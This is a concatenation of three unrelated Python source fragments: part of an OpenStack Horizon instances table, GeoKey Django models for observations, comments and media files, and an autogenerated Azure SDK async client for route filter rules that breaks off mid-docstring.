("unrescuing", pgettext_lazy("Task status of an Instance",
u"Unrescuing")),
("rebuilding", pgettext_lazy("Task status of an Instance",
u"Rebuilding")),
("rebuild_block_device_mapping", pgettext_lazy(
"Task status of an Instance", u"Rebuild Block Device Mapping")),
("rebuild_spawning", pgettext_lazy("Task status of an Instance",
u"Rebuild Spawning")),
("migrating", pgettext_lazy("Task status of an Instance", u"Migrating")),
("deleting", pgettext_lazy("Task status of an Instance", u"Deleting")),
("soft-deleting", pgettext_lazy("Task status of an Instance",
u"Soft Deleting")),
("restoring", pgettext_lazy("Task status of an Instance", u"Restoring")),
("shelving", pgettext_lazy("Task status of an Instance", u"Shelving")),
("shelving_image_pending_upload", pgettext_lazy(
"Task status of an Instance", u"Shelving Image Pending Upload")),
("shelving_image_uploading", pgettext_lazy("Task status of an Instance",
u"Shelving Image Uploading")),
("shelving_offloading", pgettext_lazy("Task status of an Instance",
u"Shelving Offloading")),
("unshelving", pgettext_lazy("Task status of an Instance",
u"Unshelving")),
)
POWER_DISPLAY_CHOICES = (
("NO STATE", pgettext_lazy("Power state of an Instance", u"No State")),
("RUNNING", pgettext_lazy("Power state of an Instance", u"Running")),
("BLOCKED", pgettext_lazy("Power state of an Instance", u"Blocked")),
("PAUSED", pgettext_lazy("Power state of an Instance", u"Paused")),
("SHUTDOWN", pgettext_lazy("Power state of an Instance", u"Shut Down")),
("SHUTOFF", pgettext_lazy("Power state of an Instance", u"Shut Off")),
("CRASHED", pgettext_lazy("Power state of an Instance", u"Crashed")),
("SUSPENDED", pgettext_lazy("Power state of an Instance", u"Suspended")),
("FAILED", pgettext_lazy("Power state of an Instance", u"Failed")),
("BUILDING", pgettext_lazy("Power state of an Instance", u"Building")),
)
class InstancesFilterAction(tables.FilterAction):
filter_type = "server"
filter_choices = (('name', _("Instance Name"), True),
('status', _("Status ="), True),
('image', _("Image ID ="), True),
('flavor', _("Flavor ID ="), True))
class InstancesTable(tables.DataTable):
TASK_STATUS_CHOICES = (
(None, True),
("none", True)
)
STATUS_CHOICES = (
("active", True),
("shutoff", True),
("suspended", True),
("paused", True),
("error", False),
("rescue", True),
("shelved", True),
("shelved_offloaded", True),
)
name = tables.Column("name",
link="horizon:project:instances:detail",
verbose_name=_("Instance Name"))
image_name = tables.Column("image_name",
verbose_name=_("Image Name"))
ip = tables.Column(get_ips,
verbose_name=_("IP Address"),
attrs={'data-type': "ip"})
size = tables.Column(get_size,
verbose_name=_("Size"),
attrs={'data-type': 'size'})
keypair = tables.Column(get_keyname, verbose_name=_("Key Pair"))
status = tables.Column("status",
filters=(title, filters.replace_underscores),
verbose_name=_("Status"),
status=True,
status_choices=STATUS_CHOICES,
display_choices=STATUS_DISPLAY_CHOICES)
az = tables.Column("availability_zone",
verbose_name=_("Availability Zone"))
task = tables.Column("OS-EXT-STS:task_state",
verbose_name=_("Task"),
empty_value=TASK_DISPLAY_NONE,
status=True,
status_choices=TASK_STATUS_CHOICES,
display_choices=TASK_DISPLAY_CHOICES)
state = tables.Column(get_power_state,
filters=(title, filters.replace_underscores),
verbose_name=_("Power State"),
display_choices=POWER_DISPLAY_CHOICES)
created = tables.Column("created",
verbose_name=_("Time since created"),
filters=(filters.parse_isotime,
filters.timesince_sortable),
attrs={'data-type': 'timesince'})
class Meta(object):
name = "instances"
verbose_name = _("Instances")
status_columns = ["status", "task"]
row_class = UpdateRow
table_actions_menu = (StartInstance, StopInstance, SoftRebootInstance)
launch_actions = ()
if getattr(settings, 'LAUNCH_INSTANCE_LEGACY_ENABLED', True):
launch_actions = (LaunchLink,) + launch_actions
if getattr(settings, 'LAUNCH_INSTANCE_NG_ENABLED', False):
launch_actions = (LaunchLinkNG,) + launch_actions
table_actions = launch_actions + (TerminateInstance,
InstancesFilterAction)
row_actions = (StartInstance, ConfirmResize, RevertResize,
CreateSnapshot, SimpleAssociateIP, AssociateIP,
SimpleDisassociateIP, AttachInterface,
DetachInterface, EditInstance,
DecryptInstancePassword, EditInstanceSecurityGroups,
ConsoleLink, LogLink, TogglePause, ToggleSuspend,
ResizeLink, LockInstance, UnlockInstance,
SoftRebootInstance, RebootInstance,
StopInstance, RebuildInstance, TerminateInstance)
| |
from pytz import utc
from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.exceptions import ValidationError
from django.dispatch import receiver
from django.db.models.signals import pre_save, post_save
from django_pgjson.fields import JsonBField
from simple_history.models import HistoricalRecords
from geokey.core.exceptions import InputError
from .base import OBSERVATION_STATUS, COMMENT_STATUS, COMMENT_REVIEW
from .manager import ObservationManager, CommentManager
from django.contrib.gis.db import models as gis
from .base import LOCATION_STATUS
from .manager import LocationManager
from .manager import MediaFileManager
from .base import MEDIA_STATUS
class Location(models.Model):
"""
Represents a location to which an arbitrary number of observations can be
attached.
"""
name = models.CharField(max_length=100, blank=True, null=True)
description = models.TextField(blank=True, null=True)
geometry = gis.GeometryField(geography=True)
created_at = models.DateTimeField(auto_now_add=True)
creator = models.ForeignKey(settings.AUTH_USER_MODEL)
version = models.IntegerField(default=1)
private = models.BooleanField(default=False)
private_for_project = models.ForeignKey('projects.Project', null=True)
status = models.CharField(
choices=LOCATION_STATUS,
default=LOCATION_STATUS.active,
max_length=20
)
objects = LocationManager()
class Observation(models.Model):
"""
Stores a single observation.
"""
location = models.ForeignKey(
Location, related_name='locations'
)
project = models.ForeignKey(
'projects.Project', related_name='observations'
)
category = models.ForeignKey('categories.Category')
status = models.CharField(
choices=OBSERVATION_STATUS,
default=OBSERVATION_STATUS.active,
max_length=20
)
properties = JsonBField(default={})
created_at = models.DateTimeField(auto_now_add=True)
creator = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name='creator'
)
updated_at = models.DateTimeField(null=True, auto_now_add=True)
updator = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name='updator',
null=True
)
version = models.IntegerField(default=1)
search_matches = models.TextField()
display_field = models.TextField(null=True, blank=True)
num_media = models.IntegerField(default=0)
num_comments = models.IntegerField(default=0)
history = HistoricalRecords()
objects = ObservationManager()
class Meta:
ordering = ['-updated_at', 'id']
@classmethod
def validate_partial(self, category, data):
"""
Validates the data against the category field definition. This is a
partial validation, which is used to validate drafts, field values
that are not provided are not validated.
Parameter
---------
category : geokey.categories.models.Category
Category that the data is validated against
data : dict
Dictionary of key-value-pairs; incoming data that is validated
Raises
------
ValidationError:
when data is invalid
"""
is_valid = True
error_messages = []
for field in category.fields.all().filter(status='active'):
if field.key in data and data.get(field.key) is not None:
try:
field.validate_input(data.get(field.key))
except InputError, error:
is_valid = False
error_messages.append(error)
if not is_valid:
raise ValidationError(error_messages)
@classmethod
def validate_full(self, category, data):
"""
Validates the data against the category field definition. This is a
full validation.
Parameter
---------
category : geokey.categories.models.Category
Category that the data is validated against
data : dict
Dictionary of key-value-pairs; incoming data that is validated
Raises
------
ValidationError:
when data is invalid
"""
is_valid = True
error_messages = []
for field in category.fields.all().filter(status='active'):
try:
field.validate_input(data.get(field.key))
except InputError, error:
is_valid = False
error_messages.append(error)
if not is_valid:
raise ValidationError(error_messages)
@classmethod
def create(cls, properties=None, creator=None, location=None,
category=None, project=None, status=None):
"""
Creates and returns a new observation. Validates all fields first and
raises a ValidationError if at least one field did not validate.
Creates the object if all fields are valid.
Parameter
---------
properties : dict
Attributes of the observation
creator : geokey.users.models.User
User who creates the observation
location : geokey.contributions.models.Location
Location of the contribution
category : geokey.categories.models.Category
Category of the contribution
project : geokey.projects.models.Project
Project the contribution is assigned to
status : str
Status of the contribution; one of active, review, pending or draft
Return
------
geokey.contributions.models.Observation
The observation created
"""
if not properties:
properties = {}
location.save()
observation = cls.objects.create(
location=location,
category=category,
project=project,
properties=properties,
creator=creator,
status=status
)
return observation
def update(self, properties, updator, status=None):
"""
Updates data of the observation
Parameter
---------
properties : dict
Attributes of the observation
updator : geokey.users.models.User
User who creates the observation
status : str
Status of the contribution; one of active, review, pending or draft
Return
------
geokey.contributions.models.Observation
The updated observation
"""
if status != 'draft':
self.version = self.version + 1
if properties:
self.properties = properties
self.updator = updator
self.status = status or self.status
self.updated_at = datetime.utcnow().replace(tzinfo=utc)
self.save()
return self
def update_display_field(self):
"""
Updates the display_field attribute. It uses the display field of the
contributions category and adds a string line 'key:value' to the
display field property
"""
display_field = self.category.display_field
if display_field is not None:
value = None
if self.properties:
value = self.properties.get(display_field.key)
self.display_field = '%s:%s' % (display_field.key, value)
def update_count(self):
"""
Updates the count of media files attached and comments. Should be
called each time a file or comment is added/deleted.
"""
self.num_media = self.files_attached.count()
self.num_comments = self.comments.count()
self.save()
def update_search_matches(self):
"""
Updates the search_matches property, which is used to filter
contributions against a query string. It reads all fields from the
category and creates a string like 'key1:value#####key2:value2'
"""
search_matches = []
for field in self.category.fields.all():
if self.properties and field.key in self.properties.keys():
if field.fieldtype == 'LookupField':
l_id = self.properties.get(field.key)
if l_id is not None:
lookup = field.lookupvalues.get(pk=l_id)
search_matches.append('%s:%s' % (
field.key, lookup.name
))
elif field.fieldtype == 'MultipleLookupField':
values = self.properties.get(field.key)
if values is not None:
lookups = []
for l_id in values:
lookups.append(
field.lookupvalues.get(pk=l_id).name
)
search_matches.append('%s:%s' % (
field.key,
', '.join(lookups))
)
else:
term = self.properties.get(field.key)
if term is not None:
search_matches.append(
'%s:%s' % (field.key, term)
)
self.search_matches = '#####'.join(search_matches)
def delete(self):
"""
Deletes the observation by setting it's status to DELETED
"""
self.status = OBSERVATION_STATUS.deleted
self.save()
@receiver(pre_save, sender=Observation)
def pre_save_observation_update(sender, **kwargs):
"""
Receiver that is called before an observation is saved. Updates
search_matches and display_field properties.
"""
observation = kwargs.get('instance')
observation.update_display_field()
observation.update_search_matches()
class Comment(models.Model):
"""
A comment that is added to a contribution.
"""
text = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
creator = models.ForeignKey(settings.AUTH_USER_MODEL)
commentto = models.ForeignKey('Observation', related_name='comments')
respondsto = models.ForeignKey(
'Comment',
null=True,
blank=True,
related_name='responses'
)
status = models.CharField(
choices=COMMENT_STATUS,
default=COMMENT_STATUS.active,
max_length=20
)
review_status = models.CharField(
choices=COMMENT_REVIEW,
null=True,
blank=True,
max_length=10
)
objects = CommentManager()
class Meta:
ordering = ['id']
def delete(self):
"""
Deletes the comment by setting it's status to DELETED
"""
self.responses.all().delete()
self.status = COMMENT_STATUS.deleted
self.save()
@receiver(post_save, sender=Comment)
def post_save_comment_update(sender, **kwargs):
"""
Receiver that is called after a comment is saved. Updates num_media and
num_comments properties.
"""
comment = kwargs.get('instance')
comment.commentto.update_count()
class MediaFile(models.Model):
"""
Base class for all media files. Not to be instaciate; instaciate one of
the child classes instead.
"""
name = models.CharField(max_length=100)
description = models.TextField(null=True, blank=True)
contribution = models.ForeignKey(
'contributions.Observation', related_name='files_attached'
)
creator = models.ForeignKey(settings.AUTH_USER_MODEL)
created_at = models.DateTimeField(auto_now_add=True)
status = models.CharField(
choices=MEDIA_STATUS,
default=MEDIA_STATUS.active,
max_length=20
)
objects = MediaFileManager()
class Meta:
ordering = ['id']
@property
def type_name(self):
"""
Returns the type of media file. To be implemented by child classes.
Raises
------
NotImplementedError
if called on MediaFile base class
"""
raise NotImplementedError(
'The property `type_name` has not been implemented for this '
'subclass of `MediaFile`.'
)
def delete(self):
"""
Deletes a file by setting its status to deleted
"""
self.status = MEDIA_STATUS.deleted
self.save()
@receiver(post_save, sender=MediaFile)
def post_save_media_file_update(sender, **kwargs):
"""
Receiver that is called after a media file is saved. Updates num_media and
num_comments properties.
"""
media_file = kwargs.get('instance')
media_file.contribution.update_count()
class ImageFile(MediaFile):
"""
Stores images uploaded by users.
"""
image = models.ImageField(upload_to='user-uploads/images')
class Meta:
ordering = ['id']
app_label = 'contributions'
@property
def type_name(self):
"""
Returns file type name
Returns
-------
str
'ImageFile'
"""
return 'ImageFile'
class VideoFile(MediaFile):
"""
Stores images uploaded by users.
"""
video = models.ImageField(upload_to='user-uploads/videos')
youtube_id = models.CharField(max_length=100)
thumbnail = models.ImageField(upload_to='user-uploads/videos', null=True)
youtube_link = models.URLField(max_length=255, null=True, blank=True)
swf_link = models.URLField(max_length=255, null=True, blank=True)
class Meta:
ordering = ['id']
@property
def type_name(self):
"""
Returns file type name
Returns
-------
str
'VideoFile'
"""
return 'VideoFile'
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RouteFilterRulesOperations:
"""RouteFilterRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified rule from a route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the rule.
:type rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
rule_name=rule_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def get(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
**kwargs: Any
) -> "_models.RouteFilterRule":
"""Gets the specified rule from a route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the rule.
:type rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RouteFilterRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.RouteFilterRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.RouteFilterRule",
**kwargs: Any
) -> "_models.RouteFilterRule":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(route_filter_rule_parameters, 'RouteFilterRule')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.RouteFilterRule",
**kwargs: Any
) -> AsyncLROPoller["_models.RouteFilterRule"]:
"""Creates or updates a route in the specified route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the route filter rule.
:type rule_name: str
:param route_filter_rule_parameters: Parameters supplied to the create or update route filter
rule operation.
:type route_filter_rule_parameters: ~azure.mgmt.network.v2019_07_01.models.RouteFilterRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.RouteFilterRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
rule_name=rule_name,
route_filter_rule_parameters=route_filter_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.PatchRouteFilterRule",
**kwargs: Any
) -> "_models.RouteFilterRule":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(route_filter_rule_parameters, 'PatchRouteFilterRule')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def begin_update(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.PatchRouteFilterRule",
**kwargs: Any
) -> AsyncLROPoller["_models.RouteFilterRule"]:
"""Updates a route in the specified route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the route filter rule.
:type rule_name: str
:param route_filter_rule_parameters: Parameters supplied to the update route filter rule
operation.
:type route_filter_rule_parameters: ~azure.mgmt.network.v2019_07_01.models.PatchRouteFilterRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.RouteFilterRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
rule_name=rule_name,
route_filter_rule_parameters=route_filter_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
def list_by_route_filter(
self,
resource_group_name: str,
route_filter_name: str,
**kwargs: Any
) -> AsyncIterable["_models.RouteFilterRuleListResult"]:
"""Gets all RouteFilterRules in a route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either RouteFilterRuleListResult or the result of cls(response)
